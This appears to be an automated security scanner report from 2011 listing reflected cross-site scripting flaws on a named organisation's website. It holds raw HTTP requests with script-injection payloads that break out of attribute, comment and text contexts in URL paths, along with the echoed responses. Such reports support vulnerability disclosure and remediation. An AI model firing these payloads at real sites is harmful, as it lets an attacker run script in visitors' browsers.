GET /events1cf72--><script>alert(1)</script>d544780bb6c/sponsor-exhibit.htm HTTP/1.1 Host: www.opengroup.org Proxy-Connection: keep-alive Referer: http://www.opengroup.org/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.3.10.1298915328
Response
HTTP/1.1 404 Not Found Date: Mon, 28 Feb 2011 17:51:09 GMT Server: Apache/1.3.37 (Unix) PHP/4.4.4 Content-Type: text/html Content-Length: 5155
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f6b1d"><script>alert(1)</script>cdbe446a6e7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /eventsf6b1d"><script>alert(1)</script>cdbe446a6e7/sponsor-exhibit.htm HTTP/1.1 Host: www.opengroup.org Proxy-Connection: keep-alive Referer: http://www.opengroup.org/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.3.10.1298915328
Response
HTTP/1.1 404 Not Found Date: Mon, 28 Feb 2011 17:51:04 GMT Server: Apache/1.3.37 (Unix) PHP/4.4.4 Content-Type: text/html Content-Length: 5152
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 49b7b"><script>alert(1)</script>c9155194fff was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /events/sponsor-exhibit.htm49b7b"><script>alert(1)</script>c9155194fff HTTP/1.1 Host: www.opengroup.org Proxy-Connection: keep-alive Referer: http://www.opengroup.org/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.3.10.1298915328
Response
HTTP/1.1 404 Not Found Date: Mon, 28 Feb 2011 17:51:25 GMT Server: Apache/1.3.37 (Unix) PHP/4.4.4 Content-Type: text/html Content-Length: 5152
The value of REST URL parameter 2 is copied into an HTML comment. The payload f73ce--><script>alert(1)</script>eb1f8baa7f8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /events/sponsor-exhibit.htmf73ce--><script>alert(1)</script>eb1f8baa7f8 HTTP/1.1 Host: www.opengroup.org Proxy-Connection: keep-alive Referer: http://www.opengroup.org/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.3.10.1298915328
Response
HTTP/1.1 404 Not Found Date: Mon, 28 Feb 2011 17:51:32 GMT Server: Apache/1.3.37 (Unix) PHP/4.4.4 Content-Type: text/html Content-Length: 5155
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 1aab5<script>alert(1)</script>2fa9f53bf11 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /events/sponsor-exhibit.htm1aab5<script>alert(1)</script>2fa9f53bf11 HTTP/1.1 Host: www.opengroup.org Proxy-Connection: keep-alive Referer: http://www.opengroup.org/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.3.10.1298915328
Response
HTTP/1.1 404 Not Found Date: Mon, 28 Feb 2011 17:51:29 GMT Server: Apache/1.3.37 (Unix) PHP/4.4.4 Content-Type: text/html Content-Length: 5146
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d03a9<script>alert(1)</script>8588ad7c49d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /favicon.icod03a9<script>alert(1)</script>8588ad7c49d HTTP/1.1 Host: www.opengroup.org Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.1.10.1298915328
Response
HTTP/1.1 404 Not Found Date: Mon, 28 Feb 2011 17:51:08 GMT Server: Apache/1.3.37 (Unix) PHP/4.4.4 Content-Type: text/html Content-Length: 4228
The value of REST URL parameter 1 is copied into an HTML comment. The payload 60e14--><script>alert(1)</script>e2d1c01bf64 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /favicon.ico60e14--><script>alert(1)</script>e2d1c01bf64 HTTP/1.1 Host: www.opengroup.org Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.1.10.1298915328
Response
HTTP/1.1 404 Not Found Date: Mon, 28 Feb 2011 17:51:11 GMT Server: Apache/1.3.37 (Unix) PHP/4.4.4 Content-Type: text/html Content-Length: 4234
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9518a"><script>alert(1)</script>7cfc26038a0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /member9518a"><script>alert(1)</script>7cfc26038a0/ HTTP/1.1 Host: www.opengroup.org Proxy-Connection: keep-alive Referer: http://www.opengroup.org/events/sponsor-exhibit.htm Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.4.10.1298915328
Response
HTTP/1.1 404 Not Found Date: Mon, 28 Feb 2011 17:51:09 GMT Server: Apache/1.3.37 (Unix) PHP/4.4.4 Content-Type: text/html Content-Length: 5147
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e150e<script>alert(1)</script>79cf08e9fff was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /membere150e<script>alert(1)</script>79cf08e9fff/ HTTP/1.1 Host: www.opengroup.org Proxy-Connection: keep-alive Referer: http://www.opengroup.org/events/sponsor-exhibit.htm Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.4.10.1298915328
Response
HTTP/1.1 404 Not Found Date: Mon, 28 Feb 2011 17:51:11 GMT Server: Apache/1.3.37 (Unix) PHP/4.4.4 Content-Type: text/html Content-Length: 5141
The value of REST URL parameter 1 is copied into an HTML comment. The payload 55638--><script>alert(1)</script>939d930983d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /member55638--><script>alert(1)</script>939d930983d/ HTTP/1.1 Host: www.opengroup.org Proxy-Connection: keep-alive Referer: http://www.opengroup.org/events/sponsor-exhibit.htm Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.4.10.1298915328
Response
HTTP/1.1 404 Not Found Date: Mon, 28 Feb 2011 17:51:14 GMT Server: Apache/1.3.37 (Unix) PHP/4.4.4 Content-Type: text/html Content-Length: 5150
The value of REST URL parameter 1 is copied into an HTML comment. The payload d840c--><script>alert(1)</script>b085a6e8f6a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /togafd840c--><script>alert(1)</script>b085a6e8f6a/ HTTP/1.1 Host: www.opengroup.org Proxy-Connection: keep-alive Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=TOGAF Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Date: Mon, 28 Feb 2011 17:49:26 GMT Server: Apache/1.3.37 (Unix) PHP/4.4.4 Content-Type: text/html Content-Length: 4224
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 26e07<script>alert(1)</script>229d277a473 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /togaf26e07<script>alert(1)</script>229d277a473/ HTTP/1.1 Host: www.opengroup.org Proxy-Connection: keep-alive Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=TOGAF Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Date: Mon, 28 Feb 2011 17:49:24 GMT Server: Apache/1.3.37 (Unix) PHP/4.4.4 Content-Type: text/html Content-Length: 4218
The value of REST URL parameter 1 is copied into an HTML comment. The payload 9edeb--><script>alert(1)</script>120de7a4391 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /togaf99edeb--><script>alert(1)</script>120de7a4391/cert/ HTTP/1.1 Host: www.opengroup.org Proxy-Connection: keep-alive Referer: http://www.opengroup.org/togaf/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.1.10.1298915328
Response
HTTP/1.1 404 Not Found Date: Mon, 28 Feb 2011 17:52:00 GMT Server: Apache/1.3.37 (Unix) PHP/4.4.4 Content-Type: text/html Content-Length: 5125
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4fa9b<script>alert(1)</script>23835d6a4f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /togaf94fa9b<script>alert(1)</script>23835d6a4f/cert/ HTTP/1.1 Host: www.opengroup.org Proxy-Connection: keep-alive Referer: http://www.opengroup.org/togaf/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.1.10.1298915328
Response
HTTP/1.1 404 Not Found Date: Mon, 28 Feb 2011 17:51:57 GMT Server: Apache/1.3.37 (Unix) PHP/4.4.4 Content-Type: text/html Content-Length: 5113
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 77a7d"><script>alert(1)</script>5d373802e00 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /togaf977a7d"><script>alert(1)</script>5d373802e00/cert/ HTTP/1.1 Host: www.opengroup.org Proxy-Connection: keep-alive Referer: http://www.opengroup.org/togaf/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.1.10.1298915328
Response
HTTP/1.1 404 Not Found Date: Mon, 28 Feb 2011 17:51:55 GMT Server: Apache/1.3.37 (Unix) PHP/4.4.4 Content-Type: text/html Content-Length: 5122
The value of REST URL parameter 2 is copied into an HTML comment. The payload a8972--><script>alert(1)</script>2670c9f9ea1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /togaf9/certa8972--><script>alert(1)</script>2670c9f9ea1/ HTTP/1.1 Host: www.opengroup.org Proxy-Connection: keep-alive Referer: http://www.opengroup.org/togaf/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.1.10.1298915328
Response
HTTP/1.1 404 Not Found Date: Mon, 28 Feb 2011 17:52:18 GMT Server: Apache/1.3.37 (Unix) PHP/4.4.4 Content-Type: text/html Content-Length: 5125
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 296c2"><script>alert(1)</script>a8f2df5e418 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /togaf9/cert296c2"><script>alert(1)</script>a8f2df5e418/ HTTP/1.1 Host: www.opengroup.org Proxy-Connection: keep-alive Referer: http://www.opengroup.org/togaf/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.1.10.1298915328
Response
HTTP/1.1 404 Not Found Date: Mon, 28 Feb 2011 17:52:09 GMT Server: Apache/1.3.37 (Unix) PHP/4.4.4 Content-Type: text/html Content-Length: 5122
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e1cf2<script>alert(1)</script>e0cfa26c479 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /togaf9/certe1cf2<script>alert(1)</script>e0cfa26c479/ HTTP/1.1 Host: www.opengroup.org Proxy-Connection: keep-alive Referer: http://www.opengroup.org/togaf/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.1.10.1298915328
Response
HTTP/1.1 404 Not Found Date: Mon, 28 Feb 2011 17:52:15 GMT Server: Apache/1.3.37 (Unix) PHP/4.4.4 Content-Type: text/html Content-Length: 5116
If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.
In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.
GET /architecture/togaf8-doc/arch/ HTTP/1.1 Host: www.opengroup.org Proxy-Connection: keep-alive Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=TOGAF Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328
Response
HTTP/1.1 200 OK Date: Mon, 28 Feb 2011 17:50:39 GMT Server: Apache/1.3.37 (Unix) PHP/4.4.4 Content-Type: text/html Content-Length: 1042
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN"> <!--NewPage--> <html> <head> <meta name="generator" content="HTML Tidy, see www.w3.org"> <title> The Open Group Architecture Framework Versi ...[SNIP]...